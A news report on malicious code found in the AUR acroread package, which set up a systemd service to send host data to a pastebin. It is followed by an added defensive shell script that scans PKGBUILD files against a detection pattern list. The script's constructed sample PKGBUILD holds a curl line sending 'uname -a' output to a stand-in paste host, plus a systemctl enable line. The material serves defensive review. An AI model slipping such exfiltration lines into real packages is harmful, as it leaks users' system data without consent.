Malware found in Arch user repository AUR

Arch warns on its website: “AUR packages are custom content. The use of the provided files is at your own risk.” That the warning should be taken seriously, and that the PKGBUILD files in the AUR, the Arch repository of user-created and user-maintained packages, should always be checked before installation unless their creator is trusted, was shown over the weekend by malicious code in the acroread package. An attentive user had reported the package. What the creator intended, one can only guess.
The compromised package, which had previously been orphaned for a while, had been taken over by a user with the nickname “xeactor”. He had inserted a script that creates a systemd service which collects technical data about the affected system and sends it to a pastebin. However, “xeactor” made a mistake, because his script did not work as expected. Two more packages were compromised in the same way. All affected packages have now been removed and “xeactor” has been locked.
Among other things, the script evaluated commands such as uname -a and systemctl list-units and collected information about the CPU, the machine ID and Pacman in order to send it to a pastebin. A second script that it called was supposed to handle the upload, but it failed because the name uploader was used instead of the function upload. What “xeactor” was aiming at remains unclear. The information read out could, in the worst case, have affected GPG or SSH keys, but it was quite harmless.
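The article's advice is to read a PKGBUILD before building it. As an added example (not from the article, and not Arch's or the AUR's own tooling), the shell script below runs a first-pass heuristic over a PKGBUILD: it greps for the kinds of indicators the article describes, such as uploads to a paste site, creation or enabling of a systemd unit, and host-fingerprinting commands like uname -a or systemctl list-units. The pattern list and the two sample PKGBUILD files are constructed for this example; a hit means "open the file and read it by hand before running makepkg", not proof of malware, and a clean result is no guarantee either.

```shell
#!/bin/sh
# Added example: heuristic pre-install review of an AUR PKGBUILD.
# Not part of the original article and not an official Arch tool.

# Indicator patterns (assumption for this example; tune for your environment).
# They mirror what the article describes: paste-site uploads, systemd unit
# creation/enabling, and commands that fingerprint the host.
SUSPICIOUS_PATTERNS='pastebin|curl .*-d|wget .*--post|systemctl (enable|start)|/etc/systemd/system|/usr/lib/systemd/system|uname -a|systemctl list-units|/etc/machine-id|base64 -d'

# Print every matching line with its line number.
# Returns 0 when nothing matched, 1 when the file needs manual review,
# 2 when the file cannot be read.
scan_pkgbuild() {
    file="$1"
    [ -r "$file" ] || { echo "cannot read $file" >&2; return 2; }
    # "|| true" keeps a no-match grep from aborting callers that use set -e.
    hits=$(grep -nE "$SUSPICIOUS_PATTERNS" "$file" || true)
    if [ -n "$hits" ]; then
        printf '%s: review these lines before building:\n%s\n' "$file" "$hits"
        return 1
    fi
    return 0
}

# Number of suspicious lines in a file (0 when clean).
count_hits() {
    grep -cE "$SUSPICIOUS_PATTERNS" "$1" || true
}

# Constructed sample inputs for the demonstration; not the real acroread PKGBUILD.
WORKDIR=$(mktemp -d)
GOOD_PKGBUILD="$WORKDIR/PKGBUILD.clean"
BAD_PKGBUILD="$WORKDIR/PKGBUILD.suspect"

cat >"$GOOD_PKGBUILD" <<'EOF'
pkgname=hello
pkgver=1.0
package() {
  install -Dm755 hello "$pkgdir/usr/bin/hello"
}
EOF

# The quoted heredoc means nothing below is executed; it is only text to scan.
cat >"$BAD_PKGBUILD" <<'EOF'
pkgname=hello
pkgver=1.0
package() {
  install -Dm755 hello "$pkgdir/usr/bin/hello"
  # constructed indicator lines mirroring the article's description
  curl -s -d "$(uname -a)" https://pastebin.example/upload
  systemctl enable collector.service
}
EOF

# Stand-alone run: the clean file passes, the suspect file is flagged.
scan_pkgbuild "$GOOD_PKGBUILD" && echo "$GOOD_PKGBUILD: no indicators found"
scan_pkgbuild "$BAD_PKGBUILD" || echo "do not build $BAD_PKGBUILD without reading it"
```

In practice you would run scan_pkgbuild on the PKGBUILD and any .install file in the checkout before makepkg, and treat the output as a reading list rather than a verdict: the article's script would have been caught by the systemd and uname -a patterns, but a small change in wording defeats any grep, so the manual read the AUR warning asks for is still required.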

Submitted by: Arnfried Walbrecht
